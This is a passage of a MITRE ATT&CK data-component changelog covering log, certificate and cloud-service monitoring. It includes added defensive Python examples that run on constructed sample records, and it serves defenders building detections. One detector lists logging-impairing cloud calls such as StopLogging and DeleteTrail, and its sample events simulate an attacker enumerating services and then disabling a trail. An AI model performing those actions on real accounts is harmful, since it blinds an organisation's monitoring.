- SaaS Application Logs: Activity logs include user logins, configuration changes, and access to sensitive resources.
- Cloud Application Logs: Logs detail control plane activities, including API calls, instance modifications, and network changes.
- System/Application Monitoring Logs: Logs provide insights into application performance, errors, and anomalies.
This data component can be collected through the following measures:
Configure Application Logging
- Enable logging within the application or service.
- Examples:
- Web Servers: Enable access and error logs in NGINX or Apache.
- Email Systems: Enable audit logging in Microsoft Exchange or Gmail.
Centralized Log Management
- Use log management solutions like Splunk, or a cloud-native logging solution.
- Configure the application to send logs to a centralized system for analysis.
Cloud-Specific Collection
- Use services like AWS CloudWatch, Azure Monitor, or Google Cloud Operations Suite for cloud-based applications.
- Ensure logging is enabled for all critical resources (e.g., API calls, IAM changes).
SIEM Integration
- Integrate application logs with a SIEM platform (e.g., Splunk, QRadar) for real-time correlation and analysis.
- Use parsers to standardize log formats and extract key fields like timestamps, user IDs, and error codes. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
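The Application Log Content description asks for parsers that standardize log formats and extract timestamps, user IDs and error codes, and names unauthorized access attempts as the security event of interest in web logs. The Python below is an added example (not from the changelog, MITRE, or any web server project): it parses constructed lines in the combined access-log format that NGINX and Apache write by default, counts lines the parser rejects rather than dropping them silently, and flags clients that accumulate 401/403 responses inside a short window. The addresses, paths and the burst threshold are assumptions for the example.

```python
"""Parse NGINX/Apache "combined" access-log lines into standard fields and flag
bursts of unauthorized requests (401/403) from one client.

The log lines are constructed for this example; the format is the standard
combined log format that NGINX and Apache write by default.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r'^(?P<client>\S+) - (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Constructed sample: one client failing to log in repeatedly, one normal
# authenticated request, and one line that is not in combined format at all.
SAMPLE_LOG = """\
203.0.113.7 - - [18/Apr/2025:15:09:01 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [18/Apr/2025:15:09:02 +0000] "POST /login HTTP/1.1" 401 87 "-" "Mozilla/5.0"
203.0.113.7 - - [18/Apr/2025:15:09:03 +0000] "POST /login HTTP/1.1" 401 87 "-" "Mozilla/5.0"
203.0.113.7 - - [18/Apr/2025:15:09:04 +0000] "POST /login HTTP/1.1" 401 87 "-" "Mozilla/5.0"
203.0.113.7 - - [18/Apr/2025:15:09:05 +0000] "GET /admin HTTP/1.1" 403 42 "-" "Mozilla/5.0"
198.51.100.2 - alice [18/Apr/2025:15:10:00 +0000] "GET /reports HTTP/1.1" 200 2048 "-" "curl/8.0"
garbage line that does not match the combined format
"""


def parse_line(line):
    """Return a dict of typed fields, or None if the line is not combined format."""
    m = LINE_RE.match(line.rstrip("\n"))
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    rec["bytes"] = 0 if rec["bytes"] == "-" else int(rec["bytes"])
    rec["user"] = None if rec["user"] == "-" else rec["user"]
    return rec


def parse_lines(lines):
    """Parse every line; count the ones that could not be parsed instead of
    silently dropping them (a sudden rise in rejects is itself worth an alert)."""
    records, rejected = [], 0
    for line in lines:
        if not line.strip():
            continue
        rec = parse_line(line)
        if rec is None:
            rejected += 1
        else:
            records.append(rec)
    return records, rejected


def auth_failure_bursts(records, threshold=3, window=timedelta(seconds=60)):
    """Clients with at least `threshold` 401/403 responses inside `window`.
    Returns {client: total_failures}."""
    failures = defaultdict(list)
    for rec in records:
        if rec["status"] in (401, 403):
            failures[rec["client"]].append(rec["time"])
    bursts = {}
    for client, times in failures.items():
        times.sort()
        for i in range(len(times) - threshold + 1):
            if times[i + threshold - 1] - times[i] <= window:
                bursts[client] = len(times)
                break
    return bursts


if __name__ == "__main__":
    recs, bad = parse_lines(SAMPLE_LOG.splitlines())
    print(f"parsed {len(recs)} records, rejected {bad}")
    for client, n in auth_failure_bursts(recs).items():
        print(f"{client}: {n} unauthorized responses in a short window")
```

The parsed records carry the same field names whether they came from NGINX or Apache, which is the standardization step the description asks for; a SIEM ingest pipeline would emit them as structured events and keep the reject counter as a health metric.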
Certificate: Certificate Registration
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.275Z | 2025-04-18T15:14:58.597Z |
description | Queried or logged information highlighting current and expired digital certificates (ex: Certificate transparency) | Certificate Registration refers to the collection and analysis of information about digital certificates, including current, revoked, and expired certificates. Sources such as Certificate Transparency logs and other public resources provide visibility into certificates issued for specific domains or organizations. Monitoring certificate registrations can help identify potential misuse, such as unauthorized certificates or signs of adversary reconnaissance. Examples:
- Certificate Transparency Logs: These logs record the issuance of SSL/TLS certificates by trusted Certificate Authorities (CAs).
- Revoked Certificates: Information about certificates that have been invalidated before their expiration date.
- Expired Certificates: Reports of expired certificates for a domain, which may indicate lax security practices or opportunities for adversaries to exploit expired credentials.
- Domain Monitoring for Certificates: Maps SSL/TLS certificates to domains and subdomains, helping to identify any rogue certificates.
- Public Certificate Directories: Services providing APIs to query issued certificates for analysis.
This data component can be collected through the following measures:
Use Certificate Transparency Monitors
- Tools like crt.sh, CertStream, or APIs provided by certificate authorities (CAs) allow you to monitor issued certificates in real-time.
- Example: Use CertStream to stream certificate issuance logs and filter for domains of interest.
Analyze Certificate Revocation Sources
- Monitor CRLs or query OCSP responders to detect revoked certificates.
- Configure tools like OpenSSL or browsers to validate certificate revocation status automatically.
Leverage Public Scanning Tools
- Use tools such as SSL Labs, Censys, or Shodan to scan for certificate details related to your domain or network.
Automate Certificate Monitoring
- Set up automated scripts or services to parse Certificate Transparency logs for anomalies.
- Example: Automate searches on crt.sh to identify certificates issued for typo-squatted domains.
Integrate with Threat Intelligence
- Enrich certificate data with threat intelligence feeds to detect connections to known adversary-controlled infrastructure.
- Tools like VirusTotal can identify malicious certificates based on associated indicators. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
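The Certificate Registration description lists three things to look for in Certificate Transparency data: certificates for your domain from an issuer you did not expect, expired certificates that still cover it, and certificates for lookalike names. The Python below is an added example, not code from the changelog, MITRE, or crt.sh: it screens constructed entries whose fields are only modelled on the crt.sh JSON output (`issuer_name`, `common_name`, `name_value`, `not_after`, `id`) against a monitored domain. The monitored domain `example.com`, the approved-issuer set, the fixed reference time and the edit-distance threshold are all assumptions for the example; nothing is fetched from the network.

```python
"""Screen Certificate Transparency entries for a monitored domain.

The entries are constructed for this example and only modelled on the fields
crt.sh returns as JSON (issuer_name, common_name, name_value, not_after, id);
nothing is fetched. Flags: certificates for the monitored domain from an issuer
outside the expected set, expired certificates still covering it, and names that
look like the domain without belonging to it.
"""
from datetime import datetime

MONITORED = {"example.com"}            # constructed: the defender's own domain
APPROVED_ISSUERS = {"Let's Encrypt"}   # constructed: CAs the organisation actually uses
NOW = datetime(2025, 4, 18)            # fixed reference time so results are reproducible

LE = "C=US, O=Let's Encrypt, CN=R11"
SAMPLE_ENTRIES = [
    {"id": 1, "issuer_name": LE, "common_name": "example.com",
     "name_value": "example.com\nwww.example.com", "not_after": "2025-07-01T00:00:00"},
    {"id": 2, "issuer_name": "C=XX, O=Unknown CA Ltd, CN=Unknown CA", "common_name": "api.example.com",
     "name_value": "api.example.com", "not_after": "2026-01-01T00:00:00"},
    {"id": 3, "issuer_name": LE, "common_name": "examp1e.com",
     "name_value": "examp1e.com\n*.examp1e.com", "not_after": "2025-07-01T00:00:00"},
    {"id": 4, "issuer_name": LE, "common_name": "example.com.account-verify.net",
     "name_value": "example.com.account-verify.net", "not_after": "2025-07-01T00:00:00"},
    {"id": 5, "issuer_name": LE, "common_name": "old.example.com",
     "name_value": "old.example.com", "not_after": "2025-01-01T00:00:00"},
    {"id": 6, "issuer_name": LE, "common_name": "unrelated.org",
     "name_value": "unrelated.org", "not_after": "2025-07-01T00:00:00"},
]


def is_under(name, domain):
    """True when `name` is the domain itself or a subdomain of it."""
    return name == domain or name.endswith("." + domain)


def registrable_label(name):
    # Label left of the TLD. Real code should consult the Public Suffix List so
    # that "example.co.uk" yields "example" rather than "co".
    parts = name.split(".")
    return parts[-2] if len(parts) >= 2 else name


def levenshtein(a, b):
    """Edit distance, used to catch one- or two-character lookalikes."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def is_lookalike(name, domain):
    # The monitored domain used as a decoy prefix under someone else's domain.
    if name.startswith(domain + ".") or ("." + domain + ".") in name:
        return True
    d = levenshtein(registrable_label(name), registrable_label(domain))
    return 1 <= d <= 2


def analyze(entries, monitored=MONITORED, approved_issuers=APPROVED_ISSUERS, now=NOW):
    """Return (kind, name, entry_id) findings for the given CT entries."""
    findings = []
    for entry in entries:
        # name_value holds every SAN, newline-separated; wildcards share the base name.
        names = {n.strip().lower().lstrip("*.") for n in entry["name_value"].split("\n")}
        issuer_ok = any(ca in entry["issuer_name"] for ca in approved_issuers)
        expired = datetime.fromisoformat(entry["not_after"]) < now
        for name in sorted(names):
            for domain in monitored:
                if is_under(name, domain):
                    if not issuer_ok:
                        findings.append(("unexpected-issuer", name, entry["id"]))
                    if expired:
                        findings.append(("expired", name, entry["id"]))
                elif is_lookalike(name, domain):
                    findings.append(("lookalike", name, entry["id"]))
    return findings


if __name__ == "__main__":
    for kind, name, eid in analyze(SAMPLE_ENTRIES):
        print(f"{kind:18} {name:34} crt.sh id {eid}")
```

Of the six constructed entries, the screen raises four findings: the unknown issuer for `api.example.com`, the expired `old.example.com` certificate, and the two lookalikes. Feeding real crt.sh or CertStream output into `analyze` only requires the same five fields; the approved-issuer check is the part most worth keeping strict, since a certificate for your own name from a CA you never use is the clearest sign of the unauthorized certificates the description mentions.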
Cloud Service: Cloud Service Disable
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:15:30.989Z |
description | Deactivation or stoppage of a cloud service (ex: AWS Cloudtrail StopLogging) | This data component refers to monitoring actions that deactivate or stop a cloud service in a cloud control plane. Examples include disabling essential logging services like AWS CloudTrail (`StopLogging` API call), Microsoft Azure Monitor Logs, or Google Cloud's Operations Suite (formerly Stackdriver). Disabling such services can hinder visibility into adversary activities within the cloud environment. Examples:
- AWS CloudTrail StopLogging: This action stops logging of API activity for a particular trail, effectively reducing the monitoring and visibility of AWS resources and activities.
- Microsoft Azure Monitor Logs: Disabling these logs hinders the organization’s ability to detect anomalous activities and trace malicious actions.
- Google Cloud Logging: Disabling cloud logging removes visibility into resource activity, preventing monitoring of service access or configuration changes.
- SaaS Applications: Stopping logging removes visibility into user activities, such as email access or file downloads, enabling undetected malicious behavior.
This data component can be collected through the following measures:
Enable and Monitor Cloud Service Logging
- Ensure logging is enabled for all cloud services, including administrative actions like StopLogging.
- Example: Use AWS Config to verify that CloudTrail is enabled and enforce logging as a compliance rule.
API Monitoring
- Use API monitoring tools to detect calls like StopLogging or equivalent service-stopping actions in other platforms.
- Example: Monitor AWS CloudWatch for specific API events such as StopLogging and flag unauthorized users.
SIEM Integration
- Collect logs and events from the cloud control plane into a centralized SIEM for real-time analysis and correlation.
- Example: Ingest AWS CloudTrail logs into Splunk or Azure Monitor logs into Sentinel.
Cloud Security Posture Management (CSPM) Tools
- Leverage CSPM tools like Prisma Cloud, Dome9, or AWS Security Hub to detect misconfigurations or suspicious activity, such as disabled logging.
- Example: Set alerts for changes to logging configurations in CSPM dashboards.
Configure Alerts in Cloud Platforms
- Create native alerts in cloud platforms to detect service stoppages.
- Example: Configure an AWS CloudWatch alarm to trigger when StopLogging is invoked. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Cloud Service: Cloud Service Enumeration
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:15:34.195Z |
description | An extracted list of cloud services (ex: AWS ECS ListServices) | Cloud service enumeration involves listing or querying available cloud services in a cloud control plane. This activity is often performed to identify resources such as virtual machines, storage buckets, compute clusters, or other services within a cloud environment. Examples include API calls like `AWS ECS ListServices`, `Azure ListAllResources`, or `Google Cloud ListInstances`. Examples:
- AWS Cloud Service Enumeration: The adversary gathers details about existing ECS services to identify opportunities for privilege escalation or exfiltration.
- Azure Resource Enumeration: The adversary collects information about virtual machines, resource groups, and other Azure assets for reconnaissance purposes.
- Google Cloud Resource Enumeration: The attacker seeks to map the environment and find misconfigured or underutilized resources for exploitation.
- Office 365 Service Enumeration: The attacker may look for data repositories or collaboration tools to exfiltrate sensitive information.
This data component can be collected through the following measures:
Enable Cloud Activity Logging
- Ensure cloud service logs are enabled for API calls and resource usage.
- Example: Enable AWS CloudTrail, Azure Monitor, or Google Cloud Logging to track resource queries.
Centralize Logs in a SIEM
- Aggregate logs from cloud control planes into a centralized SIEM (e.g., Splunk, Azure Sentinel).
- Example: Collect AWS CloudTrail logs and set up alerts for API calls related to service enumeration.
Use Native Cloud Security Tools
- Leverage cloud-native security solutions like AWS GuardDuty, Azure Defender, or Google Security Command Center.
- Example: Use GuardDuty to detect anomalous API activity, such as ListServices being executed by an unknown user.
Implement Network Flow Logging
- Monitor and analyze VPC flow logs to identify lateral movement or enumeration activity.
- Example: Inspect flow logs for unexpected traffic between compute instances and the cloud control plane.
API Access Monitoring
- Monitor API keys and tokens used for enumeration to identify misuse or compromise.
- Example: Use AWS Secrets Manager or Azure Key Vault to manage and rotate keys securely. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
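The Cloud Service Disable and Cloud Service Enumeration descriptions above both come down to watching CloudTrail for particular API names: `StopLogging` (and similar calls that reduce visibility) in the first case, bursts of `List*`/`Describe*` calls such as `ListServices` by one principal in the second. One Python block serves both; it is an added example, not code from the changelog, MITRE or AWS. It runs over constructed records whose field names follow the CloudTrail record format (`eventTime`, `eventSource`, `eventName`, `userIdentity.arn`, `sourceIPAddress`, `requestParameters`). The account ID `123456789012`, the principal ARNs, the trail name `org-trail`, the approved-admin set and the burst threshold are all assumptions for the example.

```python
"""Detect two things in CloudTrail records: calls that switch off visibility
(StopLogging, DeleteTrail, ...) and enumeration bursts of List*/Describe*/Get*
calls by one principal.

The records are constructed for this example; field names follow the CloudTrail
record format (eventTime, eventSource, eventName, userIdentity.arn,
sourceIPAddress, requestParameters). Account 123456789012 is a placeholder.
"""
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Management-plane actions that reduce logging or configuration visibility.
VISIBILITY_IMPAIRING = {
    "StopLogging", "DeleteTrail", "UpdateTrail", "PutEventSelectors",
    "DeleteConfigRule", "StopConfigurationRecorder",
}
READ_ONLY_PREFIXES = ("List", "Describe", "Get")


def ev(time, source, name, arn, ip, params=None):
    """Build one CloudTrail-shaped record (constructed data)."""
    return {"eventTime": time, "eventSource": f"{source}.amazonaws.com", "eventName": name,
            "userIdentity": {"arn": arn}, "sourceIPAddress": ip,
            "requestParameters": params or {}}


RECON = "arn:aws:iam::123456789012:user/recon-temp"
DEPLOY = "arn:aws:sts::123456789012:assumed-role/ci-deploy/build-42"
ADMIN = "arn:aws:iam::123456789012:user/sec-admin"

SAMPLE_EVENTS = [
    ev("2025-04-18T15:15:01Z", "ecs", "ListClusters", RECON, "203.0.113.9"),
    ev("2025-04-18T15:15:02Z", "ecs", "ListServices", RECON, "203.0.113.9", {"cluster": "prod"}),
    ev("2025-04-18T15:15:03Z", "ec2", "DescribeInstances", RECON, "203.0.113.9"),
    ev("2025-04-18T15:15:04Z", "s3", "ListBuckets", RECON, "203.0.113.9"),
    ev("2025-04-18T15:15:05Z", "iam", "ListUsers", RECON, "203.0.113.9"),
    ev("2025-04-18T15:15:06Z", "iam", "ListRoles", RECON, "203.0.113.9"),
    ev("2025-04-18T15:20:00Z", "cloudtrail", "StopLogging", RECON, "203.0.113.9", {"name": "org-trail"}),
    ev("2025-04-18T15:10:00Z", "ec2", "DescribeInstances", DEPLOY, "198.51.100.4"),
    ev("2025-04-18T15:12:00Z", "cloudtrail", "DescribeTrails", ADMIN, "198.51.100.10"),
    ev("2025-04-18T15:13:00Z", "cloudtrail", "GetTrailStatus", ADMIN, "198.51.100.10", {"name": "org-trail"}),
]


def parse_time(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def detect_visibility_changes(events, approved_admins=frozenset({ADMIN})):
    """Every call that impairs logging, marked authorized only when made by a
    principal in the approved change set (the "flag unauthorized users" step)."""
    out = []
    for e in events:
        if e["eventName"] in VISIBILITY_IMPAIRING:
            arn = e["userIdentity"]["arn"]
            out.append({
                "time": e["eventTime"], "principal": arn, "action": e["eventName"],
                "target": e["requestParameters"].get("name"),
                "source_ip": e["sourceIPAddress"], "authorized": arn in approved_admins,
            })
    return out


def detect_enumeration_bursts(events, threshold=5, window=timedelta(minutes=10)):
    """Principals issuing at least `threshold` read-only API calls within
    `window`, with the set of services they touched."""
    calls = defaultdict(list)
    for e in events:
        if e["eventName"].startswith(READ_ONLY_PREFIXES):
            calls[e["userIdentity"]["arn"]].append(
                (parse_time(e["eventTime"]), e["eventSource"].split(".")[0]))
    bursts = {}
    for arn, seq in calls.items():
        seq.sort()
        for i in range(len(seq) - threshold + 1):
            if seq[i + threshold - 1][0] - seq[i][0] <= window:
                bursts[arn] = {"calls": len(seq), "services": sorted({svc for _, svc in seq})}
                break
    return bursts


if __name__ == "__main__":
    for f in detect_visibility_changes(SAMPLE_EVENTS):
        print("visibility:", f)
    for arn, b in detect_enumeration_bursts(SAMPLE_EVENTS).items():
        print("enumeration:", arn, b)
```

On the constructed records the enumeration burst and the later `StopLogging` come from the same principal, which is the correlation the two descriptions are getting at: a principal that first maps several services and then turns off the trail deserves a higher-severity alert than either event alone. The deploy role's single `DescribeInstances` and the admin's trail checks stay below the threshold.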
Cloud Service: Cloud Service Metadata
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:15:27.794Z |
description | Contextual data about a cloud service and activity around it such as name, type, or purpose/function | Cloud service metadata refers to the contextual and descriptive information about cloud services, including their name, type, purpose, configuration, and activity around them. This metadata is essential for understanding the roles and functions of cloud services, their operational status, and their potential misuse. Examples:
- Azure Service Metadata: Metadata describing a resource in Azure, such as an Azure Storage Account or a Virtual Machine.
- AWS Cloud Service Metadata: Metadata for an AWS EC2 instance collected using the `DescribeInstances` API call.
- Google Cloud Service Metadata: Metadata for a Google Compute Engine instance collected using `gcloud compute instances describe`.
- Office 365 Metadata: Metadata about an Office 365 SharePoint site.
This data component can be collected through the following measures:
Enable Cloud Metadata APIs
- Leverage APIs provided by cloud providers to query metadata about services.
- AWS: Use AWS CLI or SDKs for `DescribeInstances`, `DescribeBuckets`, etc.
- Azure: Use `az resource list` or SDKs.
- Google Cloud: Use `gcloud compute instances describe` or related commands.
- Office 365: Use Microsoft Graph API.
Centralize Metadata in a Security Platform
- Aggregate metadata from multiple clouds into a SIEM or CSPM (Cloud Security Posture Management) tool.
- Example: Integrate AWS CloudTrail with Splunk or Azure Monitor with Sentinel.
Enable Continuous Monitoring
- Set up automated jobs or workflows to regularly query and update metadata.
- Example: Use AWS Config to track resource configurations and changes over time.
Configure Access and Logging
- Enable logging for API queries to ensure access and usage of metadata are monitored.
- Example: Use AWS CloudTrail to log API activity for metadata queries.
Use Cloud Security Tools
- Employ CSPM tools like Prisma Cloud, Wiz, or Dome9 to gather metadata and identify misconfigurations.
- Example: Prisma Cloud provides consolidated views of metadata for resources across AWS, Azure, and GCP. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
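The Cloud Service Metadata description asks for metadata to be queried regularly (for example `DescribeInstances`) and for configuration changes to be tracked over time. What makes that useful for detection is the comparison between two snapshots, which the description leaves implicit. The Python below is an added example, not code from the changelog, MITRE or AWS: it diffs two constructed snapshots shaped like a `DescribeInstances` response and reduces each instance's delta to a few review reasons (instance became publicly reachable, security group added, IAM instance profile changed). The instance IDs, group IDs, the placeholder account `123456789012` and the choice of fields to compare are assumptions for the example; nothing is queried from AWS.

```python
"""Compare two EC2 DescribeInstances snapshots and report security-relevant
drift per instance.

Both snapshots are constructed for this example; their shape follows the
DescribeInstances response (Reservations -> Instances, with InstanceId,
PublicIpAddress, SecurityGroups, IamInstanceProfile, Tags, State).
"""


def instance(iid, public_ip=None, groups=(), profile=None, tags=None, state="running"):
    """Build one DescribeInstances-style instance record (constructed data)."""
    return {
        "InstanceId": iid,
        "State": {"Name": state},
        "PublicIpAddress": public_ip,
        "SecurityGroups": [{"GroupId": g, "GroupName": g} for g in groups],
        "IamInstanceProfile": {"Arn": profile} if profile else None,
        "Tags": [{"Key": k, "Value": v} for k, v in (tags or {}).items()],
    }


PROFILE_PREFIX = "arn:aws:iam::123456789012:instance-profile/"   # placeholder account
SNAPSHOT_T0 = {"Reservations": [{"Instances": [
    instance("i-0aaa", groups=["sg-web"], tags={"Name": "web-1", "Owner": "team-a"}),
    instance("i-0bbb", groups=["sg-db"], profile=PROFILE_PREFIX + "db-role"),
]}]}
SNAPSHOT_T1 = {"Reservations": [{"Instances": [
    instance("i-0aaa", public_ip="203.0.113.20", groups=["sg-web", "sg-allow-all"],
             tags={"Name": "web-1", "Owner": "team-a"}),
    instance("i-0bbb", groups=["sg-db"], profile=PROFILE_PREFIX + "admin-role"),
    instance("i-0ccc", groups=["sg-default"]),
]}]}


def index_by_id(snapshot):
    return {inst["InstanceId"]: inst
            for r in snapshot["Reservations"] for inst in r["Instances"]}


def flatten(inst):
    """Keep only the fields whose change matters for security review."""
    return {
        "state": inst["State"]["Name"],
        "public_ip": inst.get("PublicIpAddress"),
        "security_groups": sorted(g["GroupId"] for g in inst.get("SecurityGroups", [])),
        "iam_profile": (inst.get("IamInstanceProfile") or {}).get("Arn"),
        "tags": {t["Key"]: t["Value"] for t in inst.get("Tags", [])},
    }


def diff_snapshots(old, new):
    """Instances added, removed, and changed (field -> (before, after))."""
    old_idx, new_idx = index_by_id(old), index_by_id(new)
    report = {
        "added": sorted(new_idx.keys() - old_idx.keys()),
        "removed": sorted(old_idx.keys() - new_idx.keys()),
        "changed": {},
    }
    for iid in sorted(old_idx.keys() & new_idx.keys()):
        before, after = flatten(old_idx[iid]), flatten(new_idx[iid])
        delta = {k: (before[k], after[k]) for k in before if before[k] != after[k]}
        if delta:
            report["changed"][iid] = delta
    return report


def risk_reasons(delta):
    """Turn a per-instance delta into plain review reasons."""
    reasons = []
    if "public_ip" in delta and delta["public_ip"][1] and not delta["public_ip"][0]:
        reasons.append("instance became publicly reachable")
    if "security_groups" in delta and set(delta["security_groups"][1]) - set(delta["security_groups"][0]):
        reasons.append("security group added")
    if "iam_profile" in delta:
        reasons.append("IAM instance profile changed")
    return reasons


if __name__ == "__main__":
    report = diff_snapshots(SNAPSHOT_T0, SNAPSHOT_T1)
    print("added:", report["added"], "removed:", report["removed"])
    for iid, delta in report["changed"].items():
        print(iid, risk_reasons(delta), delta)
```

The same pattern applies to the other metadata sources the description lists (`az resource list`, `gcloud compute instances describe`, Microsoft Graph): store each poll, flatten the fields you care about, and alert on the delta rather than on the raw dump.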
Cloud Service: Cloud Service Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:15:24.409Z |
description | Changes made to a cloud service, including its settings and/or data (ex: AWS CloudTrail DeleteTrail or DeleteConfigRule) | Cloud service modification refers to changes made to the configuration, settings, or data of a cloud service. These modifications can include administrative changes such as enabling or disabling features, altering permissions, or deleting critical components. Monitoring these changes is critical to detect potential misconfigurations or malicious activity. Examples:
- AWS Cloud Service Modifications: A user disables AWS CloudTrail logging (StopLogging) or deletes a CloudWatch configuration rule (DeleteConfigRule).
- Azure Cloud Service Modifications: Changes to Azure Role-Based Access Control (RBAC) roles, such as adding a new Contributor role to a sensitive resource.
- Google Cloud Service Modifications: Deletion of a Google Cloud Storage bucket or disabling a Google Cloud Function.
- Office 365 Cloud Service Modifications: Altering mailbox permissions or disabling auditing in Microsoft 365.
This data component can be collected through the following measures:
Enable Cloud Audit Logging
- AWS: Enable AWS CloudTrail for logging management events such as StopLogging or DeleteTrail.
- Azure: Use Azure Activity Logs to monitor resource changes and access actions.
- Google Cloud: Enable Google Cloud Audit Logs to track API calls, resource modifications, and policy changes.
- Office 365: Use Unified Audit Logs in Microsoft Purview to track administrative actions.
Centralize Log Storage
- Consolidate logs from all cloud providers into a SIEM or CSPM (Cloud Security Posture Management) tool.
- Example: Use Splunk or Elastic Stack to ingest and analyze logs from AWS, Azure, and Google Cloud.
Automate Alerts for Sensitive Changes
- Configure alerts for high-risk actions, such as disabling logging or modifying IAM roles.
- AWS Example: Use AWS Config rules to detect and notify changes to critical services.
- Azure Example: Set up Azure Monitor alerts for write actions on sensitive resources.
Enable Continuous Monitoring
- Use tools like AWS Security Hub, Azure Defender, or Google Chronicle to continuously monitor cloud service modifications for anomalies. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Cloud Storage: Cloud Storage Access
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:13:49.144Z |
description | Opening of a cloud storage infrastructure, typically to collect/read its value (ex: AWS S3 GetObject) | Cloud storage access refers to the retrieval or interaction with data stored in cloud infrastructure. This data component includes activities such as reading, downloading, or accessing files and objects within cloud storage systems. Common examples include API calls like GetObject in AWS S3, which retrieves objects from cloud buckets. Examples:
- AWS S3 Access: An adversary uses the `GetObject` API to retrieve sensitive data from an AWS S3 bucket.
- Azure Blob Storage Access: A user accesses a blob in Azure Storage using `Get Blob` or `Get Blob Properties`.
- Google Cloud Storage Access: An adversary uses `storage.objects.get` to download objects from
- OpenStack Swift Storage Access: A user retrieves an object from OpenStack Swift using the `GET` method.
This data component can be collected through the following measures:
Enable Logging for Cloud Storage Services
- AWS S3: Enable Server Access Logging to capture API calls like `GetObject` and store them in a designated S3 bucket.
- Azure Storage: Enable Azure Storage Logging to capture operations like `GetBlob` and log metadata.
- Google Cloud Storage: Enable Data Access audit logs for `storage.objects.get` API calls.
- OpenStack Swift: Configure middleware for object logging to capture GET requests.
Centralize and Aggregate Logs
- Use a centralized logging solution (e.g., Splunk, ELK, or a cloud-native SIEM) to ingest and analyze logs from different cloud providers.
- AWS Example: Use AWS CloudTrail to collect API activity logs and forward them to your SIEM.
- Azure Example: Use Azure Monitor and Log Analytics to analyze storage access logs.
Correlate with IAM Logs
- Combine storage access logs with IAM activity logs to correlate user actions with specific permissions and identities. |
x_mitre_version | 1.0 | 1.1 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Cloud Storage: Cloud Storage Creation
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
revoked | | False |
x_mitre_deprecated | | False |
x_mitre_domains | | ['enterprise-attack'] |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:14:01.974Z |
description | Initial construction of new cloud storage infrastructure (ex: AWS S3 CreateBucket) | Cloud Storage Creation refers to the initial creation of a new cloud storage resource, such as buckets, containers, or directories, within a cloud environment. This action is critical to track as it might indicate the legitimate provisioning of resources or unauthorized actions taken by adversaries to stage, store, or exfiltrate data. Examples:
- AWS S3 Bucket Creation: An AWS user creates a new S3 bucket using the `CreateBucket` API call.
- Azure Blob Storage Container Creation: A user creates a new container in Azure Blob Storage using the `Create Container` operation.
- Google Cloud Storage Bucket Creation: A Google Cloud user creates a new bucket using `storage.buckets.create`.
- OpenStack Swift Container Creation: A user creates a new container in OpenStack Swift using the `PUT` method.
This data component can be collected through the following measures:
Enable Logging for Cloud Storage Services
- AWS S3: Enable AWS CloudTrail to log CreateBucket API actions.
- Azure Blob Storage: Enable Azure Monitor and Diagnostic Logs for storage account activity. Use Azure Event Grid to capture Create Container operations.
